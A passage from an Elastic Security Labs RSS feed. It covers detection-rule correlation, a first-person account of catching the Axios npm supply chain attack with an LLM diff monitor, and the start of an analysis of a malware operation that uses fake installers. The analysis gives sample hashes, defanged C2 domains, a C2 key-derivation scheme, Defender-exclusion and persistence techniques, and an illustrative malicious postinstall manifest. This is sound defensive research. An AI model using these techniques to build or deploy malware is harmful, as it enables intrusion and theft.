<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml#L17">Suricata and Elastic Defend Network Correlation</a></p>
<p>Generic by MITRE ATT&amp;CK:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_risky_host_esql.toml#L17">Alerts in Different ATT&amp;CK Tactics by Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_same_tactic_by_host.toml#L18">Multiple Alerts in Same ATT&amp;CK Tactic by Host</a></p>
<p>Generic multi-integrations correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_srcip.toml#L17">Alerts From Multiple Integrations by Source Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_dstip.toml#L17">Alerts From Multiple Integrations by Destination Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_user.toml#L17">Alerts From Multiple Integrations by User Name</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_elastic_detection_rule.toml#L17">Newly Observed High Severity Detection Alert</a></p>
<p>Lateral movement correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml">Suspected Lateral Movement from Compromised Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/lateral_movement_multi_alerts_new_srcip.toml#L15">Lateral Movement Alerts from a Newly Observed Source Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/lateral_movement_multi_alerts_new_userid.toml#L16">Lateral Movement Alerts from a Newly Observed User</a></p>
<p>Observability and security correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml#L17">Detection Alert on a Process Exhibiting CPU Spike</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml#L17">Multiple Alerts on a Host Exhibiting CPU Spike</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_newly_observed_process_with_high_cpu.toml#L18">Newly Observed Process Exhibiting High CPU Usage</a></p>
<p>Machine Learning correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/d358641c452dc0af5ab85d02f6f8948ec57c7ab9/rules/cross-platform/multiple_machine_learning_jobs_by_entity.toml#L16">Multiple Machine Learning Alerts by Influencer Field</a></p>
<p>Other correlation ideas:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_vulnerabilities_wiz_by_container.toml#L18">Multiple Vulnerabilities by Asset via Wiz</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml#L17">Elastic Defend and Email Alerts Correlation</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml#L23">Suspicious Kerberos Authentication Ticket Request</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/credential_access_multi_could_secrets_via_api.toml#L19">Multiple Cloud Secrets Accessed by Source Address</a></p>
<p>These examples illustrate how correlating alerts across endpoints, network, and observability can <strong>enrich context, accelerate investigations, and improve detection confidence</strong>.  We are actively expanding coverage in this area to support additional correlation scenarios.</p>
<p>You can enable them by filtering for the tag value <code>Rule Type: Higher-Order Rule</code> on the rules management page:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image4.png" alt="" /></p>
<p>Over a 15-day period, alert counts remained within acceptable volume (~30 alerts/day). Targeted tuning of initial outliers is expected to reduce them to ~20 alerts/day and materially improve overall signal quality.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image5.png" alt="" /></p>
<h3>Considerations and Trade-offs</h3>
<p>Higher-Order Rules introduce potential scheduling latency. Since they query alert indices, there is an inherent delay between when base alerts fire and when correlations surface. Rule scheduling intervals and lookback windows should be tuned to balance timeliness against performance cost. Additionally, HOR quality depends directly on the quality of the base detections: a noisy atomic rule will cascade false positives into every correlation that references it. We recommend tuning base rules aggressively before enabling dependent Higher-Order Rules. Finally, ES|QL queries over broad index patterns (e.g. logs-*) can be expensive at scale. In high-volume environments, scoping index patterns to specific datasets or using data views can significantly reduce query cost.</p>
<h2>Conclusion</h2>
<p>Higher-Order Rules are essential for prioritizing alert triage and managing alert volumes for automation and AI-driven analysis. When combined with <a href="https://www.elastic.co/kr/docs/solutions/security/advanced-entity-analytics/entity-risk-scoring">Entity Risk Scoring</a>, Higher-Order Rules can feed directly into host and user risk profiles, creating a quantitative prioritization layer that further reduces manual triage burden. In our production tests, the majority of these detections produced a medium-to-low alert volume, making them practical for real-world use. While a small number of noisy rules or false positives may initially surface, excluding these at the atomic rule level quickly leaves a robust set of high-value correlations.</p>
<p>To maximize their effectiveness, two operational practices are critical. First, ensure that input alerts use severity levels that accurately reflect both noise and real-world impact: cleaning and normalizing severity is foundational to meaningful correlation. Second, start small and expand deliberately: avoid trying to correlate every possible alert signal. Exclude inherently noisy tactics (such as discovery), deprioritize low-severity signals, and deprecate rules that disproportionately influence correlation outcomes.</p>
<p>Applied correctly, Higher-Order Rules streamline investigations, improve detection accuracy, and significantly increase the efficiency and trustworthiness of modern security operations.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/higher-order-detection-rules.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[How we caught the Axios supply chain attack]]></title>
            <link>https://www.elastic.co/kr/security-labs/how-we-caught-the-axios-supply-chain-attack</link>
            <guid>how-we-caught-the-axios-supply-chain-attack</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Joe Desimone shares the story of how he caught the Axios supply chain attack with a proof of concept tool built in an afternoon.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Last Monday night I was working late when a Slack alert came in from a monitoring tool I had built three days earlier. Axios, one of the most popular npm packages in the world, had been compromised.</p>
<p>My heart started racing; I knew every second mattered to respond and limit the damage. But honestly, it was so crazy that I thought it must be a false positive. I checked and rechecked everything a few times even though it seemed very obviously malicious.</p>
<p>It wasn't a false positive. It was one of the largest supply chain compromises ever on npm, with presumed attribution to DPRK state actors. We caught it with a proof of concept I hacked together on a Friday afternoon, running on my laptop, powered by AI reading diffs.</p>
<p>I want to share the whole story. How we got here, what I built, and why I think sharing it openly makes everyone a little safer.</p>
<h2>I've been worried about supply chain for a while</h2>
<p>Some recent supply chain incidents have genuinely had me up at night. Supply chain compromise is a hard problem. At Elastic we have so many developers, and our security customers are trusting us to protect them. It has been clear that the status quo is broken, and we need some new technology or procedures to help. I had some ideas around a more trusted, AI-vetted ecosystem, building on app control principles while limiting cost and friction.</p>
<p>But the <a href="https://www.theregister.com/2026/03/30/telnyx_pypi_supply_chain_attack_litellm/">Trivy compromise</a> was really where I took notice. On March 19th, a group called TeamPCP compromised the <a href="https://github.com/aquasecurity/trivy-action">aquasecurity/trivy-action</a> GitHub Action (the one for the popular Trivy security scanner, yes, a security tool). They injected a credential stealer that harvested secrets from CI/CD pipelines. A massive amount of credentials were stolen.</p>
<p>That cascaded fast. On March 24th, <a href="https://docs.litellm.ai/blog/security-update-march-2026">LiteLLM got hit</a>. TeamPCP had stolen LiteLLM's PyPI publishing credentials through the poisoned Trivy pipeline, and used them to push malicious versions that were aggressive credential stealers. SSH keys, cloud creds, API keys, wallet data, everything.</p>
<p>LiteLLM is a package I had used myself. So you could say at that point I was fully &quot;up at night.&quot;</p>
<p>I knew that with all the credentials leaked from the Trivy breach, there was definitely going to be more. We needed to do something to stay ahead of it. Both for our customers and to protect Elastic.</p>
<h2>Friday, after the red-eye</h2>
<p>I had just flown back from <a href="https://www.rsaconference.com/">RSAC 2026</a> in San Francisco. Red-eye flight Thursday night. If you've done a red-eye after four days of conference, you know the state I was in. However, I was as excited as ever for a new project, so I sat down and hammered out v0.0.1.</p>
<p>The idea: monitor changes as they get pushed to package repos. Run a diff to see what changed. Use AI/LLM to determine if the changes are malicious. That's basically it.</p>
<p>The pipeline looks like:</p>
<ol>
<li>Poll PyPI's changelog API and npm's CouchDB <code>_changes</code> feed for new releases</li>
<li>Filter against a watchlist of the top 15,000 packages by download count</li>
<li>Download the old and new versions directly from the registry (no pip install, no npm install, no code execution)</li>
<li>Diff them into a markdown report</li>
<li>Send the diff to an LLM: &quot;is this malicious?&quot;</li>
<li>If yes, alert to Slack</li>
</ol>
<p>I wanted to focus mainly on top packages since that's most likely where attackers would go anyway, and it would be much less costly in terms of tokens and compute. It was completely manageable to run on my laptop.</p>
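<p>The watchlist gate (step 2) is what keeps token and compute costs manageable, and it can be sketched in a few lines of Python. The package names and queue handling below are illustrative, not the actual tool's code:</p>
<pre><code>import queue

# Step 2 of the pipeline: only releases of watched packages get queued for diffing.
WATCHLIST = frozenset(["axios", "lodash", "express"])  # placeholder top-N set

def enqueue_if_watched(release, watchlist, work_queue):
    """Queue a (name, version) release only if the package is on the watchlist."""
    name, version = release
    if name in watchlist:
        work_queue.put((name, version))
        return True
    return False

work = queue.Queue()
for release in [("axios", "0.30.4"), ("left-pad", "1.3.0")]:
    enqueue_if_watched(release, WATCHLIST, work)
# Only the axios release is queued; left-pad is not on the watchlist.
</code></pre>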
<h2>Why Cursor</h2>
<p>There are a lot of agent harnesses out there. I've written my own for projects like AI malware reverse engineering. But I was very short on time, so I chose to harness up <a href="https://cursor.com/docs/cli/overview">Cursor</a> since it's one of my main dev tools. The Agent CLI lets you invoke it programmatically: pass a workspace, an instruction, and a model. I run it in <code>ask</code> mode (read-only) so it can only read the diff, never modify anything. The whole analysis step is a single subprocess call.</p>
<p>The prompt is simple. I tell it what to look for (obfuscated code, base64, exec/eval, unexpected network calls, steganography, persistence mechanisms, lifecycle script abuse) and ask it to respond with <code>Verdict: malicious</code> or <code>Verdict: benign</code>. Parse the verdict, act on it.</p>
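<p>Parsing that verdict line is worth doing defensively, so a malformed model response is never silently treated as benign. A minimal sketch (the actual parsing in supply-chain-monitor may differ):</p>
<pre><code>def parse_verdict(report):
    """Extract the final 'Verdict: ...' line from the model's free-text analysis.
    Anything unparseable comes back as 'unknown' rather than 'benign'."""
    verdict = "unknown"
    for raw in report.splitlines():
        line = raw.strip().lower()
        if line.startswith("verdict:"):
            verdict = line.split(":", 1)[1].strip()
    return verdict
</code></pre>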
<h2>On model selection</h2>
<p>I normally use Opus 4.6 or GPT 5.4 for most things. Opus especially for cybersecurity-focused tasks. But I wanted to keep costs down for something that needs to analyze dozens of releases per hour.</p>
<p>There have been some really good blog posts from the Cursor team lately, one on <a href="https://cursor.com/blog/fast-regex-search">fast regex search for agent tools</a> and another on their <a href="https://cursor.com/blog/real-time-rl-for-composer">real-time RL approach</a> where they use actual production inference tokens as training signals and deploy improved checkpoints roughly every five hours. Genuinely impressive engineering.</p>
<p>So I wanted to give Composer 2 a shot. I used fast mode, which is truly fast. Perfect for a real-time use case. Low cost, fast, and effective (in my testing).</p>
<h2>Testing on Telnyx</h2>
<p>You have to test these things to know they'll actually work. Usually that means tweaking prompts a bunch.</p>
<p>I got lucky (or unlucky) with timing. On the same Friday I was building this, the <a href="https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026">telnyx PyPI package got compromised</a> by TeamPCP. They injected 74 lines of malicious code into <code>_client.py</code>: payloads hidden inside WAV audio files (steganography), base64 obfuscation, a Windows persistence implant disguised as <code>msbuild.exe</code>, and exfiltration to a hardcoded C2.</p>
<p>I used the diff between the legitimate and malicious <code>telnyx</code> package to build out the initial prompt. The model was very good at identifying malicious changes like this. I also wanted to know immediately when a compromise was detected, so I added Slack alerting.</p>
<h2>Monday night</h2>
<p>I let it run over the weekend. It churned through releases, everything coming back benign.</p>
<p>I never got a single false positive, which is honestly strange if you've ever done detection work in cybersecurity. We're usually drowning in FPs. I intentionally instructed the LLM to only alert on &quot;high confidence&quot; supply chain compromises, as they are generally trigger-happy out of the box. Still catching the Telnyx test case, with no FPs. Could be overfitting with such a low sample size, but no time to build something more robust.</p>
<p>Then Monday night, working late, the Slack alert came in.</p>
<pre><code>🚨 Supply Chain Alert: axios 0.30.4
Verdict: MALICIOUS
npm: https://www.npmjs.com/package/axios/v/0.30.4
</code></pre>
<p>Did it really just find one of the biggest supply chain compromises in recent memory?</p>
<p>I checked the analysis. Rechecked it. Checked it again. The attackers had compromised a maintainer's npm account, changed the email to a ProtonMail account they controlled, and published two malicious versions (1.14.1 and 0.30.4). They didn't inject code directly into Axios. Instead they added a phantom dependency called <code>plain-crypto-js</code> that ran a postinstall hook deploying cross-platform malware. It was obviously malicious.</p>
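<p>The phantom-dependency trick works because npm runs a dependency's lifecycle scripts automatically at install time. A hypothetical manifest shape for such a package is shown below; the script filename is made up, and this illustrates only the mechanism, not the actual payload:</p>
<pre><code>{
  "name": "plain-crypto-js",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node setup.js"
  }
}
</code></pre>
<p>Any project that picks up the poisoned Axios version transitively installs this package, and its <code>postinstall</code> hook executes on the developer's machine or CI runner with no further interaction.</p>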
<h2>The response</h2>
<p>I reached out immediately to our infosec team and research team at Elastic to get them spun up. I knew every second mattered. It turns out that when I contacted them, they had already received Elastic Defend alerts on a host that had installed the malicious package and were actively responding. But at that point nobody had realized the extent of the issue or had a root cause understanding of how the machine became infected. The monitoring tool provided that missing context.</p>
<p>I tried sending an email to <code>security@npmjs</code> and got a bounce back. Tried submitting to their security portal and got an error. I tweeted out in desperation to get a hold of a human. I also quickly opened a security issue on the axios repo itself.</p>
<p>Later, I saw a tweet from another researcher who had observed the compromise, and I realized I was handling this more as a vulnerability than a supply chain incident. With a vulnerability you coordinate quietly. With an active compromise that is installing malware on people's machines right now, going wide and open is the right call. So I immediately shared all the details I had compiled on X.</p>
<p>We even started getting alerts from our telemetry showing impacted orgs in the wild. The thing was actively running.</p>
<p>Fortunately, the Axios team jumped on it and pulled the packages pretty quickly. Also, the attacker's C2 server was getting so many requests that it was falling over. It could have been a lot worse.</p>
<p>Our team at Elastic Security Labs published full technical write-ups on the compromise. The first covers the end-to-end attack chain, the cross-platform malware, and the C2 protocol: <a href="https://www.elastic.co/kr/security-labs/axios-one-rat-to-rule-them-all">Inside the Axios supply chain compromise - one RAT to rule them all</a>. The second covers hunting and detection rules across Linux, Windows, and macOS: <a href="https://www.elastic.co/kr/security-labs/axios-supply-chain-compromise-detections">Elastic releases detections for the Axios supply chain compromise</a>.</p>
<h2>Where we go from here</h2>
<p>The state of things right now is not great, and we need to do better as a whole software ecosystem, not just the security industry.</p>
<p>In two weeks in March:</p>
<ul>
<li>Trivy (a security scanner) was compromised to steal CI/CD secrets</li>
<li>LiteLLM was compromised using those stolen secrets</li>
<li>Telnyx was compromised in the same campaign</li>
<li>Axios, one of the most depended-upon packages in npm, was compromised by a suspected DPRK actor</li>
<li>and more</li>
</ul>
<p>Package registries are critical infrastructure. The teams running PyPI and npm are doing great work, but the threat has moved past what current trust models can handle. We need better automated monitoring of package changes. Not just signature scanning but actually understanding what code does. LLMs are genuinely good at this, as this project shows. And we need credential rotation after breaches to happen faster. The Trivy-to-LiteLLM-to-Telnyx cascade happened because stolen creds weren't rotated quickly enough.</p>
<p>One practical thing you can do right now: don't pull in package updates immediately. Add a soak time. Let new versions sit for a period before your builds pick them up. We do this with our CI/CD systems at Elastic in <a href="https://www.elastic.co/kr/blog/shai-hulud-worm-2-0-updated-response">response</a> to shai-hulud. It won't stop everything, but it gives the community time to catch compromises before they hit your CI/CD pipelines and developer machines. The good news is that many package managers have added native support for this. For example, to enforce a 7-day delay:</p>
<pre><code>npm config set min-release-age 7
pnpm config set minimum-release-age 10080
yarn config set npmMinimumReleaseAge 10080
uv --exclude-newer &quot;7 days ago&quot;
</code></pre>
<h2>We're open sourcing this</h2>
<p>We're releasing the tool: <a href="https://github.com/elastic/supply-chain-monitor"><strong>supply-chain-monitor</strong></a></p>
<p>I want to be upfront. It's a proof of concept. I built it in an afternoon on no sleep. I don't expect anyone to run it at a production level. It requires a Cursor subscription for the LLM analysis, it processes releases sequentially, and the watchlists are static.</p>
<p>But the approach works. Diffing package releases in real-time and using AI to classify the changes caught a supply chain attack on one of the most popular packages in npm.</p>
<p>I'm sharing this because it's best for the community to learn from our experiences. If someone takes this idea and builds something better, great. If a package registry team builds it into their pipeline, even better. If it means someone else has a big save next time, this was worth it.</p>
<h2>How it works (for the curious)</h2>
<p><strong>Monitoring:</strong> Two threads poll PyPI (via <code>changelog_since_serial()</code> XML-RPC) and npm (via CouchDB <code>_changes</code> feed). New releases matching the top-N watchlist get queued. State persists to <code>last_serial.yaml</code> so it picks up where it left off.</p>
<p><strong>Diffing:</strong> Old and new versions downloaded directly from registry APIs. No pip/npm install, no code execution. Archives extracted, files hashed, unified diff report generated in markdown.</p>
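<p>The diffing step needs no package-manager tooling at all: once both versions are extracted, a unified diff per file gives the model everything it needs to reason about the change. A stdlib-only sketch (the real tool also hashes files, handles binaries, and renders markdown):</p>
<pre><code>import difflib

def diff_report(old_files, new_files):
    """Unified-diff every file path present in either extracted version.
    old_files/new_files map relative paths to file text."""
    sections = []
    for path in sorted(set(old_files) | set(new_files)):
        old = old_files.get(path, "").splitlines(keepends=True)
        new = new_files.get(path, "").splitlines(keepends=True)
        diff = "".join(difflib.unified_diff(old, new, "old/" + path, "new/" + path))
        if diff:
            sections.append(diff)
    return "\n".join(sections)
</code></pre>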
<p><strong>Analysis:</strong> Diff report goes to Cursor Agent CLI in read-only mode. Prompt asks it to look for supply chain indicators. Output parsed for the verdict.</p>
<p><strong>Alerting:</strong> Malicious verdict fires a Slack message with the package name, rank, registry link, and analysis summary.</p>
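<p>A small formatter keeps the Slack payload consistent with the alert shape shown earlier; the field layout here is illustrative, not the tool's exact message:</p>
<pre><code>def format_alert(package, version, registry_url, summary):
    """Assemble the Slack alert text for a malicious verdict."""
    return "\n".join([
        "Supply Chain Alert: " + package + " " + version,
        "Verdict: MALICIOUS",
        "npm: " + registry_url,
        summary,
    ])
</code></pre>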
<h2>AI in security, beyond this project</h2>
<p>Supply chain security is a big issue, but we aren’t powerless. AI gives us new tools to defend at scale at machine speed. This project is one example of using AI to help with a security problem, but we've been doing a lot of interesting work with AI across Elastic Security more broadly. One thing I'd highlight: our team recently published a post on <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">using Attack Discovery, Workflows, and Agent Builder to automatically detect and confirm APT-level attacks</a>. This shows the power of the Elastic Platform, delivering agentic security to meaningfully improve the efficiency and efficacy of your SOC in a time when we are collectively drowning in attacks.</p>
<hr />
<p><em>The supply-chain-monitor project is available at <a href="https://github.com/elastic/supply-chain-monitor">github.com/elastic/supply-chain-monitor</a>.</em></p>
<p><em>Thanks to the Elastic Infosec team for the rapid incident response, the axios maintainers for the quick takedown, and the security community for the collective effort that limited the blast radius.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/how-we-caught-the-axios-supply-chain-attack/how-we-caught-the-axios-supply-chain-attack.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Fake Installers to Monero: A Multi-Tool Mining Operation]]></title>
            <link>https://www.elastic.co/kr/security-labs/fake-installers-to-monero</link>
            <guid>fake-installers-to-monero</guid>
            <pubDate>Tue, 31 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs dissects a long-running operation deploying RATs, cryptominers, and CPA fraud through fake installer lures, tracking its evolution across campaigns and Monero payouts.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Elastic Security Labs has been tracking a financially motivated operation, designated REF1695, that has been active since at least late 2023. The operator deploys a combination of RATs, cryptominers, and custom XMRig loaders through fake installer packages. Across all observed campaigns, the infection chains share a consistent packing technique, overlapping C2 infrastructure, and common social engineering patterns, linking them to a single operator.</p>
<p>Beyond cryptomining, the threat actor monetizes infections through CPA (Cost Per Action) fraud, directing victims to content locker pages under the guise of software registration. In this report, we trace the operation's evolution across multiple campaign builds, analyze the C2 communication protocols, document a previously unreported .NET implant (CNB Bot), and track the operator's financial returns via public Monero mining pool dashboards.</p>
<h3>Key takeaways</h3>
<ul>
<li>Financially motivated campaigns have been active since late 2023, deploying various RATs and cryptominers through fake installer packages.</li>
<li>Operator monetizes infections through both cryptomining and CPABuild fraud.</li>
<li>Stages use a consistent Themida/WinLicense + .NET Reactor packing combination.</li>
<li>CNB Bot is a previously undocumented .NET implant with RSA-2048 signed task authentication.</li>
<li>A custom XMRig loader evades detection by killing the miner whenever analysis tools are running, and deploys WinRing0x64.sys.</li>
<li>Over 27.88 XMR has been paid out across four tracked wallets, with active workers at the time of writing.</li>
<li>We leveraged a Claude-driven agentic pipeline to automate the extraction of payload stages and implant configurations.</li>
</ul>
<h2>Campaign 1 (CNB Bot)</h2>
<p>The most recent campaign drops CNB Bot, using an ISO file as the infection vector. The ISO image contains two files: a single-stage .NET Reactor-protected loader further packed with Themida/WinLicense 3.x, and a ReadMe.txt. Associated ISO samples:</p>
<ul>
<li><code>460203070b5a928390b126fcd52c15ed3a668b77536faa6f0a0282cf1c157162</code></li>
<li><code>b8b7aecce2a4d00f209b1e4d30128ba6ef0f83bbdc05127f6f8ba97e7d6df291</code></li>
<li><code>9977b9185472c7d4be22c20f93bc401dd74bb47223957015a3261994d54c59fc</code></li>
<li><code>9fa23382820b1e781f3e05e9452176a72529395643f09080777fab7b9c6b1f5c</code></li>
<li><code>27db41f654b53e41a4e1621a83f2478fa46b1bbffc1923e5070440a7d410b8d3</code></li>
</ul>
<p>The ReadMe.txt serves as a social engineering lure: it frames the unsigned binary as the product of a small non-profit team that cannot afford EV code-signing, then provides explicit instructions to bypass SmartScreen via <code>&quot;More Info&quot; → &quot;Run Anyway&quot;</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image4.png" alt="ReadMe.txt lure" title="ReadMe.txt lure" /></p>
<p>Using the open-source Themida/WinLicense unpacker project <a href="https://github.com/ergrelet/unlicense">Unlicense</a>, we automatically extracted the .NET Reactor-protected loader and then passed it through <a href="https://github.com/SychicBoy/NETReactorSlayer">NETReactorSlayer</a> for deobfuscation. The majority of campaigns were observed to use this combination of protection in both the initial and subsequent stages.</p>
<p>The loader first invokes PowerShell with <code>-WindowStyle Hidden</code>, to register broad Microsoft Defender exclusions via <code>Add-MpPreference -ExclusionPath</code> and <code>Add-MpPreference -ExclusionProcess</code>, covering the loader itself, staging directories (<code>%TEMP%</code>, <code>%LocalAppData%</code>, <code>%AppData%</code>) and a set of LOLBin process names the malware later utilizes.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image10.png" alt="Setting up Microsoft Defender exclusions" title="Setting up Microsoft Defender exclusions" /></p>
<p>It then extracts an embedded .NET assembly resource and writes it to disk at <code>%TEMP%\MLPCInstallHelper.exe</code> (filename varies by build), then executes it via PowerShell. This embedded resource is a .NET Reactor-protected CNB Bot instance, discussed in detail in the <strong>Code Analysis - CNB Bot</strong> section below.</p>
<p>Since no legitimate software is installed at any point, the loader presents a fake error dialog to the user, attributing the installation failure to unmet system requirements.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image13.png" alt="Fake error dialog" title="Fake error dialog" /></p>
<h2>Campaign 2 (PureRAT)</h2>
<p>Pivoting on the ReadMe.txt lure content, we discovered a campaign dropping PureRAT v3.0.1. This campaign uses a very similar initial-stage loader as campaign 1 and introduces a second-stage loader.</p>
<p>Example ISO samples employing this chain:</p>
<ul>
<li><code>7bb0e91558244bcc79b6d7a4fe9d9882f11d3a99b70e1527aac979e27165f1d7</code></li>
<li><code>c6c4a9725653b585a9d65fc90698d4610579b289bcfb2539f7a5f7e64e69f2e4</code></li>
<li><code>a3f84aa1d15fd33506157c61368fd602d0b81f69aff6c69249bf833d217308bb</code></li>
<li><code>82c03866670b70047209c39153615512f7253f125a252fe3dcd828c6598fdf86</code></li>
<li><code>542d2267b40c160b693646bc852df34cc508281c4f6ed2693b98147dae293678</code></li>
</ul>
<p>We will be using the first sample from this list as an example for our analysis.</p>
<p>The initial-stage loader applies Microsoft Defender exclusions to the same directory set (<code>%TEMP%</code>, loader path, <code>%LocalAppData%</code>, …), but process exclusions are limited to the loader executable only. The Stage 2 payload is extracted from the embedded resource to <code>%TEMP%\&lt;...&gt;InstallHelper.exe</code> and launched via hidden PowerShell <code>Start-Process</code>. Stage 2 is protected with the same Themida + .NET Reactor packing technique.</p>
<p>Stage 2 registers only process-level Microsoft Defender exclusions.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image22.png" alt="Setting up Microsoft Defender exclusions" title="Setting up Microsoft Defender exclusions" /></p>
<p>The loader then extracts four embedded resources into the install directory at <code>%SystemDrive%\Users\%UserName%\AppData\Local\SVCData\Config</code>, dropping three unused, benign DLLs and a malicious <code>svchost.exe</code> binary, which is the third stage. Stage 3 is launched through PowerShell, and a scheduled task named <code>SVCConfig</code> is registered via <code>schtasks.exe</code> with an <code>ONLOGON</code> trigger and <code>HIGHEST</code> run level.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image33.png" alt="Stage 3 installation" title="Stage 3 installation" /></p>
<p>Following payload launch, Stage 2 writes a temporary .bat file to <code>%TEMP%</code> with a polling loop that forcefully deletes the installer binary until successful, then deletes the batch file itself.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image38.png" alt="Self-delete installer binary" title="Self-delete installer binary" /></p>
<p>Stage 3 is a Themida + .NET Reactor-protected, in-memory PE loader, which is also the beginning of the PureRAT component. The encrypted next-stage module is stored as a .NET resource and decrypted via Triple DES (3DES) in CBC mode using an embedded key and IV. The decrypted output is a GZip-compressed PE: the first 4 bytes encode the decompressed size as a little-endian integer, followed by the GZip stream.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image3.png" alt="PureRAT next-stage decryption" title="PureRAT next-stage decryption" /></p>
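<p>As an illustration, the post-decryption unwrapping described above can be sketched in Python. The 3DES-CBC step itself is omitted here; this assumes the ciphertext has already been decrypted with the embedded key and IV (e.g., using a library such as PyCryptodome):</p>

```python
import gzip


def unwrap_next_stage(decrypted: bytes) -> bytes:
    """Unpack a decrypted blob: a 4-byte little-endian decompressed
    size, followed by a GZip stream containing the next-stage PE."""
    size = int.from_bytes(decrypted[:4], "little")
    pe = gzip.decompress(decrypted[4:])
    if len(pe) != size:
        raise ValueError("size header does not match decompressed payload")
    return pe
```

The size header gives a cheap integrity check: if the GZip stream does not decompress to exactly the advertised length, the blob was not decrypted correctly.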
<p>The PureRAT v3.0.1 configuration is decoded by base64-decoding an embedded string and deserializing the result as a Protobuf message:</p>
<ul>
<li><code>23-01-26</code> (build / campaign date)</li>
<li><code>windirautoupdates[.]top</code> (C2 #1)</li>
<li><code>winautordr.itemdb[.]com</code> (C2 #2)</li>
<li><code>winautordr.ydns[.]eu</code> (C2 #3)</li>
<li><code>winautordr.kozow[.]com</code>  (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image17.png" alt="PureRAT decoded configuration" title="PureRAT decoded configuration" /></p>
<p>The C2 communication protocol derives its key material via <code>PBKDF2-SHA1(&quot;Aesthetics135&quot;, embedded_salt=010217EA2530863FF804, iter=5000)</code>, producing 96 bytes that are split into an AES-256-CBC key and an HMAC-SHA256 key. Incoming messages are authenticated by verifying the HMAC, stored in the first 32 bytes, over <code>[IV | ciphertext]</code>; the IV is then read from bytes 32-48 and used to decrypt the remaining ciphertext, yielding a <a href="https://protobuf.dev/">Protobuf</a>-encoded command message.</p>
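<p>A minimal Python sketch of this scheme's key derivation and message authentication follows. The 32/64-byte split between AES and HMAC keys is our assumption, and the AES-CBC decryption step is omitted:</p>

```python
import hashlib
import hmac

PASSPHRASE = b"Aesthetics135"
SALT = bytes.fromhex("010217EA2530863FF804")

# PBKDF2-SHA1, 5000 iterations, 96 bytes of key material.
key_material = hashlib.pbkdf2_hmac("sha1", PASSPHRASE, SALT, 5000, dklen=96)
aes_key, hmac_key = key_material[:32], key_material[32:]  # assumed split


def verify_message(blob: bytes) -> bool:
    """Authenticate a C2 message: HMAC-SHA256 tag in the first 32 bytes,
    computed over [IV | ciphertext] (the remainder of the blob)."""
    tag, iv_and_ct = blob[:32], blob[32:]
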